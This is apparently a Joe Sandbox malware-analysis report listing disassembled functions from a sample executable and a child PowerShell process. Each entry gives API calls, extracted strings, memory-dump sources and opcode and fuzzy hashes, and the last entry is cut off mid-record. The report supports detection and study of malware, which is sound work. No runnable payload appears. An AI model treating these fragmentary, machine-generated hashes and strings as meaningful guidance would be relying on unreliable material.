Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8

Function 00405CBD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68

Analysis Process: powershell.exePID: 7824, Parent PID: 7712COMMON

Executed Functions

Function 073063E8 Relevance: 13.5, Strings: 10, Instructions: 983COMMON

Download Yara Rule

Strings

x.k, xrefs: 07307135
-k, xrefs: 0730717A
tPq, xrefs: 073066D8
4'q, xrefs: 07306ECA
4'q, xrefs: 07306ED6
4'q, xrefs: 073076CB
4'q, xrefs: 0730654D
4'q, xrefs: 073076BF
4'q, xrefs: 07306541
tPq, xrefs: 073066CC

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$tPq$tPq$x.k$-k
API String ID: 0-2117659982
Opcode ID: 4394fa85cdef3b64b5e798b9bd220f878209e5466a3b7670d4dee334e1004ae9
Instruction ID: 128ffc5ceaaffac0103217fb80874c8ad7d7cc7df5194d39ef1581534f3003ed
Opcode Fuzzy Hash: 4394fa85cdef3b64b5e798b9bd220f878209e5466a3b7670d4dee334e1004ae9
Instruction Fuzzy Hash: 4B82A0B4B00305DFEB24DB54C951BAABBB2AF85304F14C0A9D9099F795CB72EC46CB91

Function 073037C8 Relevance: 8.0, Strings: 6, Instructions: 513COMMON

Download Yara Rule

Strings

tPq, xrefs: 07303BA8
4'q, xrefs: 07303A50
tPq, xrefs: 07303B9C
4'q, xrefs: 07303CDD
4'q, xrefs: 07303CE9
4'q, xrefs: 07303A46

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$tPq$tPq
API String ID: 0-3271992745
Opcode ID: fb31ae35a033c85a1cfea1c2a3c709a0c17c007a17cd922cd4e970c19cdbdf9d
Instruction ID: f13058976b4c3ad9877216ea10dfbb50e28c6d999e083689f5d77760cf8164c7
Opcode Fuzzy Hash: fb31ae35a033c85a1cfea1c2a3c709a0c17c007a17cd922cd4e970c19cdbdf9d
Instruction Fuzzy Hash: 90F14AB1B043468FE7259B6994257A6BBA2AFC2210F1880BFD549CF6D1DB31CC46C7E1

Function 073083E8 Relevance: 7.9, Strings: 6, Instructions: 373COMMON

Download Yara Rule

Strings

4'q, xrefs: 07308770
4'q, xrefs: 0730877C
4'q, xrefs: 073086FD
4'q, xrefs: 073086F1
x.k, xrefs: 073087BC
-k, xrefs: 07308801

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$x.k$-k
API String ID: 0-3499190445
Opcode ID: 79f291ea9a48509fcef904f8f78c5d704a81e9485b6d56dc2f0ec377e73d16ba
Instruction ID: c9d96926c374b504e8a4b0c967f93bdfd55afd05b1919ddc1545bbc5175b65ad
Opcode Fuzzy Hash: 79f291ea9a48509fcef904f8f78c5d704a81e9485b6d56dc2f0ec377e73d16ba
Instruction Fuzzy Hash: 03E17EB4A00205DFEB14DBA8C555BEEB7B2AF89304F14C029D5056F795CB76EC42CB91

Function 08C72A92 Relevance: 6.4, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

$q, xrefs: 08C72AEB
$q, xrefs: 08C72B07
4'q, xrefs: 08C72B3B
$q, xrefs: 08C72B13
4'q, xrefs: 08C72B2F

Memory Dump Source

Source File: 00000005.00000002.1530687188.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q$$q
API String ID: 0-170447905
Opcode ID: 9f9f09658280da8a88c12ca636e221b2428495e204e2c7187ce6daf15584e31f
Instruction ID: 71f0580cd49457ea53d075029311a4558295d848fca201236d4281aced035d9e
Opcode Fuzzy Hash: 9f9f09658280da8a88c12ca636e221b2428495e204e2c7187ce6daf15584e31f
Instruction Fuzzy Hash: 3E313831B04206CFDB388EA594516A6B7B1FF85222B14C07FDA478F255DE35C943C762

Function 07302070 Relevance: 5.6, Strings: 4, Instructions: 581COMMON

Download Yara Rule

Strings

4'q, xrefs: 07302508
4'q, xrefs: 07302512
4'q, xrefs: 073023AE
4'q, xrefs: 073023B8

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q
API String ID: 0-4210068417
Opcode ID: f539eb1925b03fd8f6eb38788091d00f71d635d57060b10c77e757c0663584e1
Instruction ID: 5fda81046a1aa9604774a1c03d7a9339e083327886b9e136f42b23f2830a6d29
Opcode Fuzzy Hash: f539eb1925b03fd8f6eb38788091d00f71d635d57060b10c77e757c0663584e1
Instruction Fuzzy Hash: 2512FBB1B04315CFE7259A6898297ABBBA6BFC5210F14807AD509DF6D1DB31CC42C7E2

Function 0730C380 Relevance: 5.5, Strings: 4, Instructions: 503COMMON

Download Yara Rule

Strings

4'q, xrefs: 0730C879
4'q, xrefs: 0730C86D
x.k, xrefs: 0730CA93
-k, xrefs: 0730CAD8

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$x.k$-k
API String ID: 0-3832083339
Opcode ID: f29dfe4ed2521fcca5f8e62dcd520c4380014f71c253018ba14c2a92cc9c1778
Instruction ID: e54d0ca3f95e55ffbf62d1d3026024862e98f85b4390aee8a32062caa4e5f3d8
Opcode Fuzzy Hash: f29dfe4ed2521fcca5f8e62dcd520c4380014f71c253018ba14c2a92cc9c1778
Instruction Fuzzy Hash: 132286B4B043149FD724DB58C951BEAB7B2AF86304F508199D9096F391CB72ED82CFA1

Function 073083C9 Relevance: 5.3, Strings: 4, Instructions: 310COMMON

Download Yara Rule

Strings

4'q, xrefs: 07308770
4'q, xrefs: 073086F1
x.k, xrefs: 073087BC
-k, xrefs: 07308801

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$x.k$-k
API String ID: 0-3832083339
Opcode ID: 06dd40f63c883f145a4ae18f90035e6cc5d92b784616b2a938dc33b9dfc4ed9c
Instruction ID: b35ec74ba6f1604af03be6094312e5987bea380b47c95a0d5e1a8507fe73b099
Opcode Fuzzy Hash: 06dd40f63c883f145a4ae18f90035e6cc5d92b784616b2a938dc33b9dfc4ed9c
Instruction Fuzzy Hash: 1CC19DB4A00205DFEB14CF98C550BEABBB2AF89304F15C059D9096F795CB36EC86CB91

Function 07307210 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

x.k, xrefs: 07307135
4'q, xrefs: 07306ECA
-k, xrefs: 0730717A

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: 3333dad218b80a4090accd0cfbe4a905489aa3442199ccc01219a58bc89a61ec
Instruction ID: 13910610248ca550c239c01942f9e6333cdd6a29f60ccfb02f8c89165f69cac6
Opcode Fuzzy Hash: 3333dad218b80a4090accd0cfbe4a905489aa3442199ccc01219a58bc89a61ec
Instruction Fuzzy Hash: 4E527EB4B00315DFEB14DB54C951B99BBB2AB85304F10C099D909AF792CB72ED86CF91

Function 0730CB71 Relevance: 4.4, Strings: 3, Instructions: 620COMMON

Download Yara Rule

Strings

4'q, xrefs: 0730C86D
x.k, xrefs: 0730CA93
-k, xrefs: 0730CAD8

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: 0e471fed368dbf9432c00035fdc21a1d529ea521e60a40d000daca600851fe22
Instruction ID: 36bfcad1f1ed4cccb41b5e3ee866713ae93a55c83b730944cf3c64a31efdb4ba
Opcode Fuzzy Hash: 0e471fed368dbf9432c00035fdc21a1d529ea521e60a40d000daca600851fe22
Instruction Fuzzy Hash: 124285B4B003149FD724DB58C951BEAB7B2AF86304F108199D9096F791CB72ED82CFA1

Function 07307321 Relevance: 4.2, Strings: 3, Instructions: 487COMMON

Download Yara Rule

Strings

x.k, xrefs: 07307135
4'q, xrefs: 07306ECA
-k, xrefs: 0730717A

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: b03a31b0e018af7aec804282a09c30c7834e63ea45b87f2a9e27379512dcfd1b
Instruction ID: d3fcb42bec499bc361ae87b1b44ee2baa441784298d03adf04f97c149c9f1edd
Opcode Fuzzy Hash: b03a31b0e018af7aec804282a09c30c7834e63ea45b87f2a9e27379512dcfd1b
Instruction Fuzzy Hash: 4E225AB4A00314DFEB24DF54CA51B99BBB2AB85704F10C099D909AF791CB72ED86CF91

Function 0730CC57 Relevance: 4.2, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

4'q, xrefs: 0730C86D
x.k, xrefs: 0730CA93
-k, xrefs: 0730CAD8

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$x.k$-k
API String ID: 0-196464176
Opcode ID: ffdb505bbff0a0e95426a8f0a4ebac2b31c29a59210c0075d618163d85a0f4fc
Instruction ID: c7c45ca2597f4043044e8d40896436f5a26709775e10ece5cc7e7376704ba0a3
Opcode Fuzzy Hash: ffdb505bbff0a0e95426a8f0a4ebac2b31c29a59210c0075d618163d85a0f4fc
Instruction Fuzzy Hash: 7C1275B4B003149FD724DB58C951BEAB7B2AF86304F508199D9096F781CB72ED82CFA1

Function 07303E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$q, xrefs: 07303E5B
$q, xrefs: 07303E23
$q, xrefs: 07303E67

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: c3c852146a487143a3baaceac3ee642d0b1be3833288cc7d8a44edfd7436d28c
Instruction ID: 417417054882f3712dccc11eee2e6549c768b535f827320fcbca2a6fc365cc59
Opcode Fuzzy Hash: c3c852146a487143a3baaceac3ee642d0b1be3833288cc7d8a44edfd7436d28c
Instruction Fuzzy Hash: DE413AF2B002169FEB249A69D8502AAF7F5AFC5610B14812EDC09EB780DB31D901C7E5

Function 08C70656 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

4'q, xrefs: 08C707C6
4'q, xrefs: 08C707BA

Memory Dump Source

Source File: 00000005.00000002.1530687188.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 171d9908b7491c3fcad9ab9881361ed66983737c87d5d0dbcd1cc70e9ebeffce
Instruction ID: 3a3182afccf2c652a273fc0a9cba941229b041ec129683f07cfa0b4f2c99adcb
Opcode Fuzzy Hash: 171d9908b7491c3fcad9ab9881361ed66983737c87d5d0dbcd1cc70e9ebeffce
Instruction Fuzzy Hash: EB414C35B00615CFDB2496B564553BAB7B2AFC1316B20847ED902CF791DE36C943C7A1

Function 07303DE0 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

$q, xrefs: 07303E5B
$q, xrefs: 07303E23

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: f3edb3c8c9c4ee2aa7890d4ffbc74a8ea05187350930f5da9d3ab8618d328ee6
Instruction ID: aa3054c375b3f63a1d518b2fe24737e2b10058ec13f0c7c8375ca55d4315e27f
Opcode Fuzzy Hash: f3edb3c8c9c4ee2aa7890d4ffbc74a8ea05187350930f5da9d3ab8618d328ee6
Instruction Fuzzy Hash: 642138F7A057538FDB218F28E8102A6BFB0AF4A210719429FDC5CE7682D3309944C7E5

Function 043DFCA9 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

4'q, xrefs: 043DFCD1
4'q, xrefs: 043DFCBF

Memory Dump Source

Source File: 00000005.00000002.1518875983.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_43d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 63d1cac6d4d95c8c900bbd3b1e406cfa6147e1a53d13c28b51c4a4a8b94c79b4
Instruction ID: 534f2a78405b9b466ac80f19d9ac89a7abfc707b0fe459675fa7d4adaddc341d
Opcode Fuzzy Hash: 63d1cac6d4d95c8c900bbd3b1e406cfa6147e1a53d13c28b51c4a4a8b94c79b4
Instruction Fuzzy Hash: BC01A2347007001FE329EB76E8107FE2BE2AFC1621B59895DC4458F695CE70A80E83A2

Function 043DFCB8 Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

4'q, xrefs: 043DFCD1
4'q, xrefs: 043DFCBF

Memory Dump Source

Source File: 00000005.00000002.1518875983.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_43d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 3d1638c624c479e238128f5ee71e2d4994f3d89caa38eb593fa70fa58da9dd1a
Instruction ID: 806da3fbe7a2c5e8589bdb74b46a291d3af3899dbcccfee4163d0ba0bd60e0aa
Opcode Fuzzy Hash: 3d1638c624c479e238128f5ee71e2d4994f3d89caa38eb593fa70fa58da9dd1a
Instruction Fuzzy Hash: E1F0AF347103041BE328EB66E8117BE72D6AFC0620F84892CC4464B694DF70A80E43A2

Function 073075AC Relevance: 1.8, Strings: 1, Instructions: 570COMMON

Download Yara Rule

Strings

4'q, xrefs: 073076BF

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: a53eb7bcd1f35bc1f518e8de62c9bc1f91ba26a8befc0201aafe51864666d102
Instruction ID: b7b1404cd5204382f8405d16cba78052d57f39212cfbcfd244f102fb378ba393
Opcode Fuzzy Hash: a53eb7bcd1f35bc1f518e8de62c9bc1f91ba26a8befc0201aafe51864666d102
Instruction Fuzzy Hash: 55322AB4B00205DFEB14CB98C595F99BBB2AB86304F65C059E9096F791CB72FC42CB91

Function 073075C0 Relevance: 1.8, Strings: 1, Instructions: 566COMMON

Download Yara Rule

Strings

4'q, xrefs: 073076BF

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: a603847d7f4802ac51ab10037676270c139232ce470410198f3099af18eff037
Instruction ID: d79ecd2d43d3d5e718d67d4329b26f44e7bd2f2a8c77f00649f5718e597d18cd
Opcode Fuzzy Hash: a603847d7f4802ac51ab10037676270c139232ce470410198f3099af18eff037
Instruction Fuzzy Hash: 0C3239B4B00205DFEB14CB98C591F99BBB2AB86304F658059E9096F791CB72FC42CB91

Function 0730D0AF Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

x.k, xrefs: 0730D3E3

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: x.k
API String ID: 0-3814145804
Opcode ID: 3d1b012e27156642f834a4ee1897401b937168e6e13acc7892fe9e692b58d978
Instruction ID: e5f23bb58870f65a87b76102acf561f28f810baec5d79f6abd9fb3ef94acedab
Opcode Fuzzy Hash: 3d1b012e27156642f834a4ee1897401b937168e6e13acc7892fe9e692b58d978
Instruction Fuzzy Hash: FCE150B4B14219DFE720CBA4C951BEAB7B2BB86304F108195D5096F785CB72ED82CF91

Function 08C706C5 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

4'q, xrefs: 08C707BA

Memory Dump Source

Source File: 00000005.00000002.1530687188.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c70000_powershell.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 621321f28129e053739867257731fb280d647f114671a6ddcd3b653ca13c6992
Instruction ID: 92238be34bef0ef295097ee3f0a689d5fceb926998454ca7f9e8e7e9fc56d5c3
Opcode Fuzzy Hash: 621321f28129e053739867257731fb280d647f114671a6ddcd3b653ca13c6992
Instruction Fuzzy Hash: A9116A75700B05DBEA3456B1214537A73B65FD0306F24003EC9029E7C2EF26CA83C7A2

Function 073045D8 Relevance: .6, Instructions: 557COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f762ecc53e4b63df020eeb47d45a23a7e0aca0a20ad3afc2d92a71690932429
Instruction ID: 57af7443959c4b3ac40760e0ce481b48bf550aaf273aba8fbe90c49d5d6df896
Opcode Fuzzy Hash: 6f762ecc53e4b63df020eeb47d45a23a7e0aca0a20ad3afc2d92a71690932429
Instruction Fuzzy Hash: 0A329EB4B00245DFE714CB98C550B9DB7B2EB86304F64C169EA09AF791CB72ED42CB91

Function 073045BC Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88bc18a5f5a36748e111dc4eb9dac277da2560edf27422b684c862fead4dc81f
Instruction ID: 21a0d3de7c06bc0cc1fe24b0c2d1d16937f8f11fd0a09e5bf2626fefd9756092
Opcode Fuzzy Hash: 88bc18a5f5a36748e111dc4eb9dac277da2560edf27422b684c862fead4dc81f
Instruction Fuzzy Hash: 74227CB4B00245DFE710CB98C550F99BBB2EB8A304F64C159EA09AF791C772ED42CB91

Function 08C61E68 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1530623737.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37e534b50c61d83d507ee606f4cb7af8ba431186f3ea67e7e1ed5173fb74cb9
Instruction ID: f957d42bbe2d88bf11842b39d32ac5b17a9f2a1fc00e9129e32ce85e4e0f1e8a
Opcode Fuzzy Hash: b37e534b50c61d83d507ee606f4cb7af8ba431186f3ea67e7e1ed5173fb74cb9
Instruction Fuzzy Hash: 46021F74A00209DFDB15CF98D884A9DBBF2FF88325F248169E905AB365C735ED52CB90

Function 08C62428 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1530623737.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5457dfb2836508b332ffdea3f148e6566de90b6dbb15f83997572e823cc88f80
Instruction ID: 9e2ae6a26a50f5d16942f5e281f4529e61ebbfa66207f8c7f6b538f997c26142
Opcode Fuzzy Hash: 5457dfb2836508b332ffdea3f148e6566de90b6dbb15f83997572e823cc88f80
Instruction Fuzzy Hash: E7021E74A01209DFDB15CF98D884A9DBBF2FF88325F248169E805AB365C735ED52CB90

Function 08C614A0 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1530623737.0000000008C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dea34bccf6a476d91cef2ea12fc2be43ab4a61e2fcd697029c22396fc010ef2
Instruction ID: babf558b4a4935820a9755b847300d1f28ad031f0a2b81f6439ff0cb2fe5fc23
Opcode Fuzzy Hash: 0dea34bccf6a476d91cef2ea12fc2be43ab4a61e2fcd697029c22396fc010ef2
Instruction Fuzzy Hash: 35022E74A01219DFDB15CF98D484A9DBBF2FF48325F288169E805AB365C731ED52CB90

Function 043D72A0 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1518875983.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_43d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3ce86fd8fe762c5f54ba288439f54dacb37871c68cb91187d385ae52a496d2
Instruction ID: 1135c75628427f251935a57db566d32fd0a6ce448638bffc84794b64a79490ff
Opcode Fuzzy Hash: 9c3ce86fd8fe762c5f54ba288439f54dacb37871c68cb91187d385ae52a496d2
Instruction Fuzzy Hash: 15C18F36B00208DFDB14DFA4E944AADBBB6FF84314F159559E806AB364DB34ED49CB80

Function 08C70A08 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1530687188.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c014b2d011cca9f0d99e73c857683c3eca5ed74f4bad9a9a264b13267e4919
Instruction ID: a3bf9f2364a2a0d88276c4764808d900df95f7bef47fca0b69a5830dc4cc0872
Opcode Fuzzy Hash: 60c014b2d011cca9f0d99e73c857683c3eca5ed74f4bad9a9a264b13267e4919
Instruction Fuzzy Hash: 13916C74A00204DFDB14CF99C555AAAB7F2AF89315F15C0A9E905AF351CB32ED42CFA2

Function 07308B88 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1525064687.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7300000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aab8290f4e9db45127ef214ae4289b1dc12bb0cfc6a51c272faf365e234601c
Instruction ID: d0f34ab437f5e5c9c8179553f901a612198121632a7b2fe53d81ad511c08753c
Opcode Fuzzy Hash: 2aab8290f4e9db45127ef214ae4289b1dc12bb0cfc6a51c272faf365e234601c
Instruction Fuzzy Hash: A07148B1B00306CFEB149A6994217EAFBF6AF82210F18847AD849DF691DB35D941C7E1

Function 08C7094E Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1530687188.0000000008C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8c70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1450d586c84060682596da5700bf2ec4620277095ee18faa8ac65f70f925ecdc
Instruction ID: 65e5a36bbd2e8c2d026cbed9d84aba7901a0fe8338bdf1c16d4a53a72ea02f0d
